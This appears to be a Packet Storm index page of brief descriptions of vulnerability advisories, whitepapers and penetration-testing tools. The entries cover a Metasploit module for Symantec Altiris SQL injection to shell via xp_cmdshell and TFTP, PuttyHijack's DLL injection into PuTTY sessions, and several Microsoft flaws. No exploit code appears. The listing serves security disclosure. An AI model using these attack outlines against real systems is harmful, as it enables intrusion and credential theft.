This Metasploit module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8 to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize numeric input fields in "UpdateComputer" notification Requests. In order to spawn a shell, several SQL injections are required in close succession, first to enable xp_cmdshell, then retrieve the payload via TFTP and finally execute it. The module also has the capability to disable or enable local application authentication. In order to work the target system must have a tftp client available.
0e3a942ab280498a695c23461a8d0a229e06c84edd64ed4f0b821529fe187516Whitepaper explaining how PHPInfo can be used to assist with the exploitation of LFI vulnerabilities on PHP when combined with the file upload handling feature that is enabled by default.
92bd4aa1033b11a08dc24bd0ba5f07564ee1566f2fbf0f928b88447e2d7d2b8aInsomnia Security Vulnerability Advisory - A flaw exists with the handling of malformed URL's passed through the ShellExeute() API in Microsoft Windows. The vulnerability does not directly cause an issue within Windows itself however, applications that call the flawed API may be vulnerable to various attacks, one of which is shown in this report.
39f5ed63255f91f74bafeb10491b25db0ff238ff227c677e96fd690e0beceae1Insomnia Security Vulnerability Advisory - A vulnerability was found in the way that webdav requests are cached and then later retrieved by Internet Explorer. This results in the use of uninitialized memory which under the right situation can lead to command execution.
0ebee2503764c3f44cce43818618fb05a3255230042be4a70fb22d4b93f6b573Insomnia Security Vulnerability Advisory - The Altiris Deployment Server Agent in Altiris Deployment Server 6.X suffers from a privilege escalation vulnerability.
ad4df9326b88cc8114e907561c055aaa21aa5a4cccfa765a54aeb3b200530a40Insomnia Security Vulnerability Advisory - Microsoft Office OneNote suffers from a URL handling vulnerability.
cd5c05fc129fad5e01ad13fafee248da86bca40d183785e3fddc3dc796468b18PuttyHijack is a proof of concept tool that injects a dll into the Putty process to hijack an existing, or soon to be created, connection. This can be useful during penetration tests when a windows box that has been compromised is used to SSH/Telnet into other servers. The injected DLL installs some hooks and creates a socket for a callback connection that is then used for input/output redirection. It does not kill the current connection, and will cleanly uninject if the socket or process is stopped.
76638a2bf29bf449a398893790d01602a562f5a3b12f15a2683f50a4e6412ef4Insomnia Security Vulnerability Advisory - Microsoft SQL Server contains a buffer overflow that can be reached by causing the server to attempt a database restore from a corrupt back file.
5a50603e65e5b46c0ff831ce59e84e01f0f7a9d8c6723e48eb9d86453a08b703iDefense Security Advisory 07.08.08 - Remote exploitation of an integer underflow vulnerability within Microsoft Corp.'s SQL Server could allow a remote attacker to execute arbitrary code with the privileges of the SQL Server. The vulnerability exists within the code responsible for parsing a stored backup file. A 32-bit integer value, representing the size of a record, is taken from the file and used to calculate the number of bytes to read into a heap buffer. This calculation can underflow, which leads to insufficient memory being allocated. The buffer is subsequently overfilled leading to an exploitable condition. iDefense confirmed the existence of this vulnerability in Microsoft SQL Server 2005 Service Pack 2 Hot Fix 4. Additional tests against SQL Server 2005 without any updates suggest it is also vulnerable. Previous versions are also suspected to be vulnerable.
fe9c3148cb2d757ad46ba64750e372614bfc507af907dfccd2670469cfd270b0Insomnia Security Vulnerability Advisory - Altiris deployment solution listens for connections from the Altiris client on port 402. It is possible to make a request to this port that will result in the encrypted domain credentials being returned. Versions 6.8.x and 6.9.x are affected.
234df1762e5efb593ef96dd70a17ec44fe21692085b54ea3770decbd5d36aeb3Insomnia Security Vulnerability Advisory - Altiris deployment solution listens for connections from the Altiris client on port 402. It is possible to make a request that will result in the exploitation of a SQL Injection vulnerability. This leads to database access under the context of the Deployment server, which typically then allows, command execution under the context of the SQL Server. Versions 6.8.x and 6.9.x are affected.
326d2fd0343a50acde785461329cd29f99ec31a55cf0fdeda6e4172d09fb8bbfA vulnerability allows attackers to remotely obtain domain credentials on vulnerable installations of Symantec Altiris Deployment Solution. User interaction is not required to exploit this vulnerability. Authentication is not required to exploit this vulnerability. The specific flaw exists within the axengine.exe service listening by default on TCP port 402. The service allows a remote client to request encrypted domain credentials without authentication. The encryption lacks a salt allowing an attacker with a local installation of Altiris Deployment Solution to easily decrypt the credentials.
7c57c51d7eb9485092b9733dd77580432e2148547cf273f9c09f17ffd9ef013fA vulnerability allows attackers to execute arbitrary code on vulnerable installations of Symantec Altiris Deployment Solution. User interaction is not required to exploit this vulnerability. The specific flaw exists within the axengine.exe process listening by default on TCP port 402. A lack of proper sanitation while parsing requests allows for a remote attacker to inject arbitrary SQL statements into the database. Exploitation of this vulnerability can result in arbitrary code execution under the context of the SYSTEM user.
148cb7d61bc722442ed25c93f163d9d66beaac36d1c62b2941df3e85f1a14b9dAccess Through Access - A whitepaper that has aggregated various material regarding how to exploit Microsoft Access during a penetration test.
acaaf07911fd3af0f81cc2e11aac7c5e782cc6b509d97994fcf2f209c11ba94e
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed